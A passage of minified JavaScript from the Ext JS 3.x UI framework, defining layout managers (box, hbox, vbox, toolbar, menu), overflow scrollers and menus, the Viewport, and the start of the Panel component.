return b.getPositionEl().up("table", 5).dom.parentNode === (a.dom || a)
}, destroy:function () {
delete this.table;
Ext.layout.TableLayout.superclass.destroy.call(this)
}});
Ext.Container.LAYOUTS.table = Ext.layout.TableLayout;
Ext.layout.AbsoluteLayout = Ext.extend(Ext.layout.AnchorLayout, {extraCls:"x-abs-layout-item", type:"absolute", onLayout:function (a, b) {
b.position();
this.paddingLeft = b.getPadding("l");
this.paddingTop = b.getPadding("t");
Ext.layout.AbsoluteLayout.superclass.onLayout.call(this, a, b)
}, adjustWidthAnchor:function (b, a) {
return b ? b - a.getPosition(true)[0] + this.paddingLeft : b
}, adjustHeightAnchor:function (b, a) {
return b ? b - a.getPosition(true)[1] + this.paddingTop : b
}});
Ext.Container.LAYOUTS.absolute = Ext.layout.AbsoluteLayout;
Ext.layout.BoxLayout = Ext.extend(Ext.layout.ContainerLayout, {defaultMargins:{left:0, top:0, right:0, bottom:0}, padding:"0", pack:"start", monitorResize:true, type:"box", scrollOffset:0, extraCls:"x-box-item", targetCls:"x-box-layout-ct", innerCls:"x-box-inner", constructor:function (a) {
Ext.layout.BoxLayout.superclass.constructor.call(this, a);
if (Ext.isString(this.defaultMargins)) {
this.defaultMargins = this.parseMargins(this.defaultMargins)
}
var d = this.overflowHandler;
if (typeof d == "string") {
d = {type:d}
}
var c = "none";
if (d && d.type != undefined) {
c = d.type
}
var b = Ext.layout.boxOverflow[c];
if (b[this.type]) {
b = b[this.type]
}
this.overflowHandler = new b(this, d)
}, onLayout:function (b, h) {
Ext.layout.BoxLayout.superclass.onLayout.call(this, b, h);
var d = this.getLayoutTargetSize(), i = this.getVisibleItems(b), c = this.calculateChildBoxes(i, d), g = c.boxes, j = c.meta;
if (d.width > 0) {
var k = this.overflowHandler, a = j.tooNarrow ? "handleOverflow" : "clearOverflow";
var e = k[a](c, d);
if (e) {
if (e.targetSize) {
d = e.targetSize
}
if (e.recalculate) {
i = this.getVisibleItems(b);
c = this.calculateChildBoxes(i, d);
g = c.boxes
}
}
}
this.layoutTargetLastSize = d;
this.childBoxCache = c;
this.updateInnerCtSize(d, c);
this.updateChildBoxes(g);
this.handleTargetOverflow(d, b, h)
}, updateChildBoxes:function (c) {
for (var b = 0, e = c.length; b < e; b++) {
var d = c[b], a = d.component;
if (d.dirtySize) {
a.setSize(d.width, d.height)
}
if (isNaN(d.left) || isNaN(d.top)) {
continue
}
a.setPosition(d.left, d.top)
}
}, updateInnerCtSize:function (c, h) {
var i = this.align, g = this.padding, e = c.width, a = c.height;
if (this.type == "hbox") {
var b = e, d = h.meta.maxHeight + g.top + g.bottom;
if (i == "stretch") {
d = a
} else {
if (i == "middle") {
d = Math.max(a, d)
}
}
} else {
var d = a, b = h.meta.maxWidth + g.left + g.right;
if (i == "stretch") {
b = e
} else {
if (i == "center") {
b = Math.max(e, b)
}
}
}
this.innerCt.setSize(b || undefined, d || undefined)
}, handleTargetOverflow:function (d, a, c) {
var e = c.getStyle("overflow");
if (e && e != "hidden" && !this.adjustmentPass) {
var b = this.getLayoutTargetSize();
if (b.width != d.width || b.height != d.height) {
this.adjustmentPass = true;
this.onLayout(a, c)
}
}
delete this.adjustmentPass
}, isValidParent:function (b, a) {
return this.innerCt && b.getPositionEl().dom.parentNode == this.innerCt.dom
}, getVisibleItems:function (g) {
var g = g || this.container, e = g.getLayoutTarget(), h = g.items.items, a = h.length, d, j, b = [];
for (d = 0; d < a; d++) {
if ((j = h[d]).rendered && this.isValidParent(j, e) && j.hidden !== true && j.collapsed !== true && j.shouldLayout !== false) {
b.push(j)
}
}
return b
}, renderAll:function (a, b) {
if (!this.innerCt) {
this.innerCt = b.createChild({cls:this.innerCls});
this.padding = this.parseMargins(this.padding)
}
Ext.layout.BoxLayout.superclass.renderAll.call(this, a, this.innerCt)
}, getLayoutTargetSize:function () {
var b = this.container.getLayoutTarget(), a;
if (b) {
a = b.getViewSize();
if (Ext.isIE && Ext.isStrict && a.width == 0) {
a = b.getStyleSize()
}
a.width -= b.getPadding("lr");
a.height -= b.getPadding("tb")
}
return a
}, renderItem:function (a) {
if (Ext.isString(a.margins)) {
a.margins = this.parseMargins(a.margins)
} else {
if (!a.margins) {
a.margins = this.defaultMargins
}
}
Ext.layout.BoxLayout.superclass.renderItem.apply(this, arguments)
}, destroy:function () {
Ext.destroy(this.overflowHandler);
Ext.layout.BoxLayout.superclass.destroy.apply(this, arguments)
}});
Ext.layout.boxOverflow.None = Ext.extend(Object, {constructor:function (b, a) {
this.layout = b;
Ext.apply(this, a || {})
}, handleOverflow:Ext.emptyFn, clearOverflow:Ext.emptyFn});
Ext.layout.boxOverflow.none = Ext.layout.boxOverflow.None;
Ext.layout.boxOverflow.Menu = Ext.extend(Ext.layout.boxOverflow.None, {afterCls:"x-strip-right", noItemsMenuText:'<div class="x-toolbar-no-items">(None)</div>', constructor:function (a) {
Ext.layout.boxOverflow.Menu.superclass.constructor.apply(this, arguments);
this.menuItems = []
}, createInnerElements:function () {
if (!this.afterCt) {
this.afterCt = this.layout.innerCt.insertSibling({cls:this.afterCls}, "before")
}
}, clearOverflow:function (a, g) {
var e = g.width + (this.afterCt ? this.afterCt.getWidth() : 0), b = this.menuItems;
this.hideTrigger();
for (var c = 0, d = b.length; c < d; c++) {
b.pop().component.show()
}
return{targetSize:{height:g.height, width:e}}
}, showTrigger:function () {
this.createMenu();
this.menuTrigger.show()
}, hideTrigger:function () {
if (this.menuTrigger != undefined) {
this.menuTrigger.hide()
}
}, beforeMenuShow:function (h) {
var b = this.menuItems, a = b.length, g, e;
var c = function (j, i) {
return j.isXType("buttongroup") && !(i instanceof Ext.Toolbar.Separator)
};
this.clearMenu();
h.removeAll();
for (var d = 0; d < a; d++) {
g = b[d].component;
if (e && (c(g, e) || c(e, g))) {
h.add("-")
}
this.addComponentToMenu(h, g);
e = g
}
if (h.items.length < 1) {
h.add(this.noItemsMenuText)
}
}, createMenuConfig:function (c, a) {
var b = Ext.apply({}, c.initialConfig), d = c.toggleGroup;
Ext.copyTo(b, c, ["iconCls", "icon", "itemId", "disabled", "handler", "scope", "menu"]);
Ext.apply(b, {text:c.overflowText || c.text, hideOnClick:a});
if (d || c.enableToggle) {
Ext.apply(b, {group:d, checked:c.pressed, listeners:{checkchange:function (g, e) {
c.toggle(e)
}}})
}
delete b.ownerCt;
delete b.xtype;
delete b.id;
return b
}, addComponentToMenu:function (b, a) {
if (a instanceof Ext.Toolbar.Separator) {
b.add("-")
} else {
if (Ext.isFunction(a.isXType)) {
if (a.isXType("splitbutton")) {
b.add(this.createMenuConfig(a, true))
} else {
if (a.isXType("button")) {
b.add(this.createMenuConfig(a, !a.menu))
} else {
if (a.isXType("buttongroup")) {
a.items.each(function (c) {
this.addComponentToMenu(b, c)
}, this)
}
}
}
}
}
}, clearMenu:function () {
var a = this.moreMenu;
if (a && a.items) {
a.items.each(function (b) {
delete b.menu
})
}
}, createMenu:function () {
if (!this.menuTrigger) {
this.createInnerElements();
this.menu = new Ext.menu.Menu({ownerCt:this.layout.container, listeners:{scope:this, beforeshow:this.beforeMenuShow}});
this.menuTrigger = new Ext.Button({iconCls:"x-toolbar-more-icon", cls:"x-toolbar-more", menu:this.menu, renderTo:this.afterCt})
}
}, destroy:function () {
Ext.destroy(this.menu, this.menuTrigger)
}});
Ext.layout.boxOverflow.menu = Ext.layout.boxOverflow.Menu;
Ext.layout.boxOverflow.HorizontalMenu = Ext.extend(Ext.layout.boxOverflow.Menu, {constructor:function () {
Ext.layout.boxOverflow.HorizontalMenu.superclass.constructor.apply(this, arguments);
var c = this, b = c.layout, a = b.calculateChildBoxes;
b.calculateChildBoxes = function (d, i) {
var l = a.apply(b, arguments), k = l.meta, e = c.menuItems;
var j = 0;
for (var g = 0, h = e.length; g < h; g++) {
j += e[g].width
}
k.minimumWidth += j;
k.tooNarrow = k.minimumWidth > i.width;
return l
}
}, handleOverflow:function (d, h) {
this.showTrigger();
var k = h.width - this.afterCt.getWidth(), l = d.boxes, e = 0, r = false;
for (var o = 0, c = l.length; o < c; o++) {
e += l[o].width
}
var a = k - e, g = 0;
for (var o = 0, c = this.menuItems.length; o < c; o++) {
var n = this.menuItems[o], m = n.component, b = n.width;
if (b < a) {
m.show();
a -= b;
g++;
r = true
} else {
break
}
}
if (r) {
this.menuItems = this.menuItems.slice(g)
} else {
for (var j = l.length - 1; j >= 0; j--) {
var q = l[j].component, p = l[j].left + l[j].width;
if (p >= k) {
this.menuItems.unshift({component:q, width:l[j].width});
q.hide()
} else {
break
}
}
}
if (this.menuItems.length == 0) {
this.hideTrigger()
}
return{targetSize:{height:h.height, width:k}, recalculate:r}
}});
Ext.layout.boxOverflow.menu.hbox = Ext.layout.boxOverflow.HorizontalMenu;
Ext.layout.boxOverflow.Scroller = Ext.extend(Ext.layout.boxOverflow.None, {animateScroll:true, scrollIncrement:100, wheelIncrement:3, scrollRepeatInterval:400, scrollDuration:0.4, beforeCls:"x-strip-left", afterCls:"x-strip-right", scrollerCls:"x-strip-scroller", beforeScrollerCls:"x-strip-scroller-left", afterScrollerCls:"x-strip-scroller-right", createWheelListener:function () {
this.layout.innerCt.on({scope:this, mousewheel:function (a) {
a.stopEvent();
this.scrollBy(a.getWheelDelta() * this.wheelIncrement * -1, false)
}})
}, handleOverflow:function (a, b) {
this.createInnerElements();
this.showScrollers()
}, clearOverflow:function () {
this.hideScrollers()
}, showScrollers:function () {
this.createScrollers();
this.beforeScroller.show();
this.afterScroller.show();
this.updateScrollButtons()
}, hideScrollers:function () {
if (this.beforeScroller != undefined) {
this.beforeScroller.hide();
this.afterScroller.hide()
}
}, createScrollers:function () {
if (!this.beforeScroller && !this.afterScroller) {
var a = this.beforeCt.createChild({cls:String.format("{0} {1} ", this.scrollerCls, this.beforeScrollerCls)});
var b = this.afterCt.createChild({cls:String.format("{0} {1}", this.scrollerCls, this.afterScrollerCls)});
a.addClassOnOver(this.beforeScrollerCls + "-hover");
b.addClassOnOver(this.afterScrollerCls + "-hover");
a.setVisibilityMode(Ext.Element.DISPLAY);
b.setVisibilityMode(Ext.Element.DISPLAY);
this.beforeRepeater = new Ext.util.ClickRepeater(a, {interval:this.scrollRepeatInterval, handler:this.scrollLeft, scope:this});
this.afterRepeater = new Ext.util.ClickRepeater(b, {interval:this.scrollRepeatInterval, handler:this.scrollRight, scope:this});
this.beforeScroller = a;
this.afterScroller = b
}
}, destroy:function () {
Ext.destroy(this.beforeScroller, this.afterScroller, this.beforeRepeater, this.afterRepeater, this.beforeCt, this.afterCt)
}, scrollBy:function (b, a) {
this.scrollTo(this.getScrollPosition() + b, a)
}, getItem:function (a) {
if (Ext.isString(a)) {
a = Ext.getCmp(a)
} else {
if (Ext.isNumber(a)) {
a = this.items[a]
}
}
return a
}, getScrollAnim:function () {
return{duration:this.scrollDuration, callback:this.updateScrollButtons, scope:this}
}, updateScrollButtons:function () {
if (this.beforeScroller == undefined || this.afterScroller == undefined) {
return
}
var d = this.atExtremeBefore() ? "addClass" : "removeClass", c = this.atExtremeAfter() ? "addClass" : "removeClass", a = this.beforeScrollerCls + "-disabled", b = this.afterScrollerCls + "-disabled";
this.beforeScroller[d](a);
this.afterScroller[c](b);
this.scrolling = false
}, atExtremeBefore:function () {
return this.getScrollPosition() === 0
}, scrollLeft:function (a) {
this.scrollBy(-this.scrollIncrement, a)
}, scrollRight:function (a) {
this.scrollBy(this.scrollIncrement, a)
}, scrollToItem:function (d, b) {
d = this.getItem(d);
if (d != undefined) {
var a = this.getItemVisibility(d);
if (!a.fullyVisible) {
var c = d.getBox(true, true), e = c.x;
if (a.hiddenRight) {
e -= (this.layout.innerCt.getWidth() - c.width)
}
this.scrollTo(e, b)
}
}
}, getItemVisibility:function (e) {
var d = this.getItem(e).getBox(true, true), a = d.x, c = d.x + d.width, g = this.getScrollPosition(), b = this.layout.innerCt.getWidth() + g;
return{hiddenLeft:a < g, hiddenRight:c > b, fullyVisible:a > g && c < b}
}});
Ext.layout.boxOverflow.scroller = Ext.layout.boxOverflow.Scroller;
Ext.layout.boxOverflow.VerticalScroller = Ext.extend(Ext.layout.boxOverflow.Scroller, {scrollIncrement:75, wheelIncrement:2, handleOverflow:function (a, b) {
Ext.layout.boxOverflow.VerticalScroller.superclass.handleOverflow.apply(this, arguments);
return{targetSize:{height:b.height - (this.beforeCt.getHeight() + this.afterCt.getHeight()), width:b.width}}
}, createInnerElements:function () {
var a = this.layout.innerCt;
if (!this.beforeCt) {
this.beforeCt = a.insertSibling({cls:this.beforeCls}, "before");
this.afterCt = a.insertSibling({cls:this.afterCls}, "after");
this.createWheelListener()
}
}, scrollTo:function (a, b) {
var d = this.getScrollPosition(), c = a.constrain(0, this.getMaxScrollBottom());
if (c != d && !this.scrolling) {
if (b == undefined) {
b = this.animateScroll
}
this.layout.innerCt.scrollTo("top", c, b ? this.getScrollAnim() : false);
if (b) {
this.scrolling = true
} else {
this.scrolling = false;
this.updateScrollButtons()
}
}
}, getScrollPosition:function () {
return parseInt(this.layout.innerCt.dom.scrollTop, 10) || 0
}, getMaxScrollBottom:function () {
return this.layout.innerCt.dom.scrollHeight - this.layout.innerCt.getHeight()
}, atExtremeAfter:function () {
return this.getScrollPosition() >= this.getMaxScrollBottom()
}});
Ext.layout.boxOverflow.scroller.vbox = Ext.layout.boxOverflow.VerticalScroller;
Ext.layout.boxOverflow.HorizontalScroller = Ext.extend(Ext.layout.boxOverflow.Scroller, {handleOverflow:function (a, b) {
Ext.layout.boxOverflow.HorizontalScroller.superclass.handleOverflow.apply(this, arguments);
return{targetSize:{height:b.height, width:b.width - (this.beforeCt.getWidth() + this.afterCt.getWidth())}}
}, createInnerElements:function () {
var a = this.layout.innerCt;
if (!this.beforeCt) {
this.afterCt = a.insertSibling({cls:this.afterCls}, "before");
this.beforeCt = a.insertSibling({cls:this.beforeCls}, "before");
this.createWheelListener()
}
}, scrollTo:function (a, b) {
var d = this.getScrollPosition(), c = a.constrain(0, this.getMaxScrollRight());
if (c != d && !this.scrolling) {
if (b == undefined) {
b = this.animateScroll
}
this.layout.innerCt.scrollTo("left", c, b ? this.getScrollAnim() : false);
if (b) {
this.scrolling = true
} else {
this.scrolling = false;
this.updateScrollButtons()
}
}
}, getScrollPosition:function () {
return parseInt(this.layout.innerCt.dom.scrollLeft, 10) || 0
}, getMaxScrollRight:function () {
return this.layout.innerCt.dom.scrollWidth - this.layout.innerCt.getWidth()
}, atExtremeAfter:function () {
return this.getScrollPosition() >= this.getMaxScrollRight()
}});
Ext.layout.boxOverflow.scroller.hbox = Ext.layout.boxOverflow.HorizontalScroller;
Ext.layout.HBoxLayout = Ext.extend(Ext.layout.BoxLayout, {align:"top", type:"hbox", calculateChildBoxes:function (r, b) {
var F = r.length, R = this.padding, D = R.top, U = R.left, y = D + R.bottom, O = U + R.right, a = b.width - this.scrollOffset, e = b.height, o = Math.max(0, e - y), P = this.pack == "start", W = this.pack == "center", A = this.pack == "end", L = 0, Q = 0, T = 0, l = 0, X = 0, H = [], k, J, M, V, w, j, S, I, c, x, q, N;
for (S = 0; S < F; S++) {
k = r[S];
M = k.height;
J = k.width;
j = !k.hasLayout && typeof k.doLayout == "function";
if (typeof J != "number") {
if (k.flex && !J) {
T += k.flex
} else {
if (!J && j) {
k.doLayout()
}
V = k.getSize();
J = V.width;
M = V.height
}
}
w = k.margins;
x = w.left + w.right;
L += x + (J || 0);
l += x + (k.flex ? k.minWidth || 0 : J);
X += x + (k.minWidth || J || 0);
if (typeof M != "number") {
if (j) {
k.doLayout()
}
M = k.getHeight()
}
Q = Math.max(Q, M + w.top + w.bottom);
H.push({component:k, height:M || undefined, width:J || undefined})
}
var K = l - a, p = X > a;
var n = Math.max(0, a - L - O);
if (p) {
for (S = 0; S < F; S++) {
H[S].width = r[S].minWidth || r[S].width || H[S].width
}
} else {
if (K > 0) {
var C = [];
for (var E = 0, v = F; E < v; E++) {
var B = r[E], t = B.minWidth || 0;
if (B.flex) {
H[E].width = t
} else {
C.push({minWidth:t, available:H[E].width - t, index:E})
}
}
C.sort(function (Y, i) {
return Y.available > i.available ? 1 : -1
});
for (var S = 0, v = C.length; S < v; S++) {
var G = C[S].index;
if (G == undefined) {
continue
}
var B = r[G], m = H[G], u = m.width, t = B.minWidth, d = Math.max(t, u - Math.ceil(K / (v - S))), g = u - d;
H[G].width = d;
K -= g
}
} else {
var h = n, s = T;
for (S = 0; S < F; S++) {
k = r[S];
I = H[S];
w = k.margins;
q = w.top + w.bottom;
if (P && k.flex && !k.width) {
c = Math.ceil((k.flex / s) * h);
h -= c;
s -= k.flex;
I.width = c;
I.dirtySize = true
}
}
}
}
if (W) {
U += n / 2
} else {
if (A) {
U += n
}
}
for (S = 0; S < F; S++) {
k = r[S];
I = H[S];
w = k.margins;
U += w.left;
q = w.top + w.bottom;
I.left = U;
I.top = D + w.top;
switch (this.align) {
case"stretch":
N = o - q;
I.height = N.constrain(k.minHeight || 0, k.maxHeight || 1000000);
I.dirtySize = true;
break;
case"stretchmax":
N = Q - q;
I.height = N.constrain(k.minHeight || 0, k.maxHeight || 1000000);
I.dirtySize = true;
break;
case"middle":
var z = o - I.height - q;
if (z > 0) {
I.top = D + q + (z / 2)
}
}
U += I.width + w.right
}
return{boxes:H, meta:{maxHeight:Q, nonFlexWidth:L, desiredWidth:l, minimumWidth:X, shortfall:l - a, tooNarrow:p}}
}});
Ext.Container.LAYOUTS.hbox = Ext.layout.HBoxLayout;
Ext.layout.VBoxLayout = Ext.extend(Ext.layout.BoxLayout, {align:"left", type:"vbox", calculateChildBoxes:function (o, b) {
var E = o.length, R = this.padding, C = R.top, V = R.left, x = C + R.bottom, O = V + R.right, a = b.width - this.scrollOffset, c = b.height, K = Math.max(0, a - O), P = this.pack == "start", X = this.pack == "center", z = this.pack == "end", k = 0, u = 0, U = 0, L = 0, m = 0, G = [], h, I, N, W, t, g, T, H, S, w, n, d, r;
for (T = 0; T < E; T++) {
h = o[T];
N = h.height;
I = h.width;
g = !h.hasLayout && typeof h.doLayout == "function";
if (typeof N != "number") {
if (h.flex && !N) {
U += h.flex
} else {
if (!N && g) {
h.doLayout()
}
W = h.getSize();
I = W.width;
N = W.height
}
}
t = h.margins;
n = t.top + t.bottom;
k += n + (N || 0);
L += n + (h.flex ? h.minHeight || 0 : N);
m += n + (h.minHeight || N || 0);
if (typeof I != "number") {
if (g) {
h.doLayout()
}
I = h.getWidth()
}
u = Math.max(u, I + t.left + t.right);
G.push({component:h, height:N || undefined, width:I || undefined})
}
var M = L - c, l = m > c;
var q = Math.max(0, (c - k - x));
if (l) {
for (T = 0, r = E; T < r; T++) {
G[T].height = o[T].minHeight || o[T].height || G[T].height
}
} else {
if (M > 0) {
var J = [];
for (var D = 0, r = E; D < r; D++) {
var A = o[D], s = A.minHeight || 0;
if (A.flex) {
G[D].height = s
} else {
J.push({minHeight:s, available:G[D].height - s, index:D})
}
}
J.sort(function (Y, i) {
return Y.available > i.available ? 1 : -1
});
for (var T = 0, r = J.length; T < r; T++) {
var F = J[T].index;
if (F == undefined) {
continue
}
var A = o[F], j = G[F], v = j.height, s = A.minHeight, B = Math.max(s, v - Math.ceil(M / (r - T))), e = v - B;
G[F].height = B;
M -= e
}
} else {
var Q = q, p = U;
for (T = 0; T < E; T++) {
h = o[T];
H = G[T];
t = h.margins;
w = t.left + t.right;
if (P && h.flex && !h.height) {
S = Math.ceil((h.flex / p) * Q);
Q -= S;
p -= h.flex;
H.height = S;
H.dirtySize = true
}
}
}
}
if (X) {
C += q / 2
} else {
if (z) {
C += q
}
}
for (T = 0; T < E; T++) {
h = o[T];
H = G[T];
t = h.margins;
C += t.top;
w = t.left + t.right;
H.left = V + t.left;
H.top = C;
switch (this.align) {
case"stretch":
d = K - w;
H.width = d.constrain(h.minWidth || 0, h.maxWidth || 1000000);
H.dirtySize = true;
break;
case"stretchmax":
d = u - w;
H.width = d.constrain(h.minWidth || 0, h.maxWidth || 1000000);
H.dirtySize = true;
break;
case"center":
var y = K - H.width - w;
if (y > 0) {
H.left = V + w + (y / 2)
}
}
C += H.height + t.bottom
}
return{boxes:G, meta:{maxWidth:u, nonFlexHeight:k, desiredHeight:L, minimumHeight:m, shortfall:L - c, tooNarrow:l}}
}});
Ext.Container.LAYOUTS.vbox = Ext.layout.VBoxLayout;
Ext.layout.ToolbarLayout = Ext.extend(Ext.layout.ContainerLayout, {monitorResize:true, type:"toolbar", triggerWidth:18, noItemsMenuText:'<div class="x-toolbar-no-items">(None)</div>', lastOverflow:false, tableHTML:['<table cellspacing="0" class="x-toolbar-ct">', "<tbody>", "<tr>", '<td class="x-toolbar-left" align="{0}">', '<table cellspacing="0">', "<tbody>", '<tr class="x-toolbar-left-row"></tr>', "</tbody>", "</table>", "</td>", '<td class="x-toolbar-right" align="right">', '<table cellspacing="0" class="x-toolbar-right-ct">', "<tbody>", "<tr>", "<td>", '<table cellspacing="0">', "<tbody>", '<tr class="x-toolbar-right-row"></tr>', "</tbody>", "</table>", "</td>", "<td>", '<table cellspacing="0">', "<tbody>", '<tr class="x-toolbar-extras-row"></tr>', "</tbody>", "</table>", "</td>", "</tr>", "</tbody>", "</table>", "</td>", "</tr>", "</tbody>", "</table>"].join(""), onLayout:function (e, j) {
if (!this.leftTr) {
var h = e.buttonAlign == "center" ? "center" : "left";
j.addClass("x-toolbar-layout-ct");
j.insertHtml("beforeEnd", String.format(this.tableHTML, h));
this.leftTr = j.child("tr.x-toolbar-left-row", true);
this.rightTr = j.child("tr.x-toolbar-right-row", true);
this.extrasTr = j.child("tr.x-toolbar-extras-row", true);
if (this.hiddenItem == undefined) {
this.hiddenItems = []
}
}
var k = e.buttonAlign == "right" ? this.rightTr : this.leftTr, l = e.items.items, d = 0;
for (var b = 0, g = l.length, m; b < g; b++, d++) {
m = l[b];
if (m.isFill) {
k = this.rightTr;
d = -1
} else {
if (!m.rendered) {
m.render(this.insertCell(m, k, d));
this.configureItem(m)
} else {
if (!m.xtbHidden && !this.isValidParent(m, k.childNodes[d])) {
var a = this.insertCell(m, k, d);
a.appendChild(m.getPositionEl().dom);
m.container = Ext.get(a)
}
}
}
}
this.cleanup(this.leftTr);
this.cleanup(this.rightTr);
this.cleanup(this.extrasTr);
this.fitToSize(j)
}, cleanup:function (b) {
var e = b.childNodes, a, d;
for (a = e.length - 1; a >= 0 && (d = e[a]); a--) {
if (!d.firstChild) {
b.removeChild(d)
}
}
}, insertCell:function (e, b, a) {
var d = document.createElement("td");
d.className = "x-toolbar-cell";
b.insertBefore(d, b.childNodes[a] || null);
return d
}, hideItem:function (a) {
this.hiddenItems.push(a);
a.xtbHidden = true;
a.xtbWidth = a.getPositionEl().dom.parentNode.offsetWidth;
a.hide()
}, unhideItem:function (a) {
a.show();
a.xtbHidden = false;
this.hiddenItems.remove(a)
}, getItemWidth:function (a) {
return a.hidden ? (a.xtbWidth || 0) : a.getPositionEl().dom.parentNode.offsetWidth
}, fitToSize:function (k) {
if (this.container.enableOverflow === false) {
return
}
var b = k.dom.clientWidth, j = k.dom.firstChild.offsetWidth, m = b - this.triggerWidth, a = this.lastWidth || 0, c = this.hiddenItems, e = c.length != 0, n = b >= a;
this.lastWidth = b;
if (j > b || (e && n)) {
var l = this.container.items.items, h = l.length, d = 0, o;
for (var g = 0; g < h; g++) {
o = l[g];
if (!o.isFill) {
d += this.getItemWidth(o);
if (d > m) {
if (!(o.hidden || o.xtbHidden)) {
this.hideItem(o)
}
} else {
if (o.xtbHidden) {
this.unhideItem(o)
}
}
}
}
}
e = c.length != 0;
if (e) {
this.initMore();
if (!this.lastOverflow) {
this.container.fireEvent("overflowchange", this.container, true);
this.lastOverflow = true
}
} else {
if (this.more) {
this.clearMenu();
this.more.destroy();
delete this.more;
if (this.lastOverflow) {
this.container.fireEvent("overflowchange", this.container, false);
this.lastOverflow = false
}
}
}
}, createMenuConfig:function (c, a) {
var b = Ext.apply({}, c.initialConfig), d = c.toggleGroup;
Ext.copyTo(b, c, ["iconCls", "icon", "itemId", "disabled", "handler", "scope", "menu"]);
Ext.apply(b, {text:c.overflowText || c.text, hideOnClick:a});
if (d || c.enableToggle) {
Ext.apply(b, {group:d, checked:c.pressed, listeners:{checkchange:function (g, e) {
c.toggle(e)
}}})
}
delete b.ownerCt;
delete b.xtype;
delete b.id;
return b
}, addComponentToMenu:function (b, a) {
if (a instanceof Ext.Toolbar.Separator) {
b.add("-")
} else {
if (Ext.isFunction(a.isXType)) {
if (a.isXType("splitbutton")) {
b.add(this.createMenuConfig(a, true))
} else {
if (a.isXType("button")) {
b.add(this.createMenuConfig(a, !a.menu))
} else {
if (a.isXType("buttongroup")) {
a.items.each(function (c) {
this.addComponentToMenu(b, c)
}, this)
}
}
}
}
}
}, clearMenu:function () {
var a = this.moreMenu;
if (a && a.items) {
a.items.each(function (b) {
delete b.menu
})
}
}, beforeMoreShow:function (h) {
var b = this.container.items.items, a = b.length, g, e;
var c = function (j, i) {
return j.isXType("buttongroup") && !(i instanceof Ext.Toolbar.Separator)
};
this.clearMenu();
h.removeAll();
for (var d = 0; d < a; d++) {
g = b[d];
if (g.xtbHidden) {
if (e && (c(g, e) || c(e, g))) {
h.add("-")
}
this.addComponentToMenu(h, g);
e = g
}
}
if (h.items.length < 1) {
h.add(this.noItemsMenuText)
}
}, initMore:function () {
if (!this.more) {
this.moreMenu = new Ext.menu.Menu({ownerCt:this.container, listeners:{beforeshow:this.beforeMoreShow, scope:this}});
this.more = new Ext.Button({iconCls:"x-toolbar-more-icon", cls:"x-toolbar-more", menu:this.moreMenu, ownerCt:this.container});
var a = this.insertCell(this.more, this.extrasTr, 100);
this.more.render(a)
}
}, destroy:function () {
Ext.destroy(this.more, this.moreMenu);
delete this.leftTr;
delete this.rightTr;
delete this.extrasTr;
Ext.layout.ToolbarLayout.superclass.destroy.call(this)
}});
Ext.Container.LAYOUTS.toolbar = Ext.layout.ToolbarLayout;
Ext.layout.MenuLayout = Ext.extend(Ext.layout.ContainerLayout, {monitorResize:true, type:"menu", setContainer:function (a) {
this.monitorResize = !a.floating;
a.on("autosize", this.doAutoSize, this);
Ext.layout.MenuLayout.superclass.setContainer.call(this, a)
}, renderItem:function (g, b, e) {
if (!this.itemTpl) {
this.itemTpl = Ext.layout.MenuLayout.prototype.itemTpl = new Ext.XTemplate('<li id="{itemId}" class="{itemCls}">', '<tpl if="needsIcon">', '<img alt="{altText}" src="{icon}" class="{iconCls}"/>', "</tpl>", "</li>")
}
if (g && !g.rendered) {
if (Ext.isNumber(b)) {
b = e.dom.childNodes[b]
}
var d = this.getItemArgs(g);
g.render(g.positionEl = b ? this.itemTpl.insertBefore(b, d, true) : this.itemTpl.append(e, d, true));
g.positionEl.menuItemId = g.getItemId();
if (!d.isMenuItem && d.needsIcon) {
g.positionEl.addClass("x-menu-list-item-indent")
}
this.configureItem(g)
} else {
if (g && !this.isValidParent(g, e)) {
if (Ext.isNumber(b)) {
b = e.dom.childNodes[b]
}
e.dom.insertBefore(g.getActionEl().dom, b || null)
}
}
}, getItemArgs:function (d) {
var a = d instanceof Ext.menu.Item, b = !(a || d instanceof Ext.menu.Separator);
return{isMenuItem:a, needsIcon:b && (d.icon || d.iconCls), icon:d.icon || Ext.BLANK_IMAGE_URL, iconCls:"x-menu-item-icon " + (d.iconCls || ""), itemId:"x-menu-el-" + d.id, itemCls:"x-menu-list-item ", altText:d.altText || ""}
}, isValidParent:function (b, a) {
return b.el.up("li.x-menu-list-item", 5).dom.parentNode === (a.dom || a)
}, onLayout:function (a, b) {
Ext.layout.MenuLayout.superclass.onLayout.call(this, a, b);
this.doAutoSize()
}, doAutoSize:function () {
var c = this.container, a = c.width;
if (c.floating) {
if (a) {
c.setWidth(a)
} else {
if (Ext.isIE) {
c.setWidth(Ext.isStrict && (Ext.isIE7 || Ext.isIE8 || Ext.isIE9) ? "auto" : c.minWidth);
var d = c.getEl(), b = d.dom.offsetWidth;
c.setWidth(c.getLayoutTarget().getWidth() + d.getFrameWidth("lr"))
}
}
}
}});
Ext.Container.LAYOUTS.menu = Ext.layout.MenuLayout;
Ext.Viewport = Ext.extend(Ext.Container, {initComponent:function () {
Ext.Viewport.superclass.initComponent.call(this);
document.getElementsByTagName("html")[0].className += " x-viewport";
this.el = Ext.getBody();
this.el.setHeight = Ext.emptyFn;
this.el.setWidth = Ext.emptyFn;
this.el.setSize = Ext.emptyFn;
this.el.dom.scroll = "no";
this.allowDomMove = false;
this.autoWidth = true;
this.autoHeight = true;
Ext.EventManager.onWindowResize(this.fireResize, this);
this.renderTo = this.el
}, fireResize:function (a, b) {
this.fireEvent("resize", this, a, b, a, b)
}});
Ext.reg("viewport", Ext.Viewport);
Ext.Panel = Ext.extend(Ext.Container, {baseCls:"x-panel", collapsedCls:"x-panel-collapsed", maskDisabled:true, animCollapse:Ext.enableFx, headerAsText:true, buttonAlign:"right", collapsed:false, collapseFirst:true, minButtonWidth:75, elements:"body", preventBodyReset:false, padding:undefined, resizeEvent:"bodyresize", toolTarget:"header", collapseEl:"bwrap", slideAnchor:"t", disabledClass:"", deferHeight:true, expandDefaults:{duration:0.25}, collapseDefaults:{duration:0.25}, initComponent:function () {
Ext.Panel.superclass.initComponent.call(this);
this.addEvents("bodyresize", "titlechange", "iconchange", "collapse", "expand", "beforecollapse", "beforeexpand", "beforeclose", "close", "activate", "deactivate");
if (this.unstyled) {
this.baseCls = "x-plain"
}
this.toolbars = [];
if (this.tbar) {
this.elements += ",tbar";
this.topToolbar = this.createToolbar(this.tbar);
this.tbar = null
}
if (this.bbar) {
this.elements += ",bbar";
this.bottomToolbar = this.createToolbar(this.bbar);
this.bbar = null
}
if (this.header === true) {
this.elements += ",header";
this.header = null
} else {
if (this.headerCfg || (this.title && this.header !== false)) {
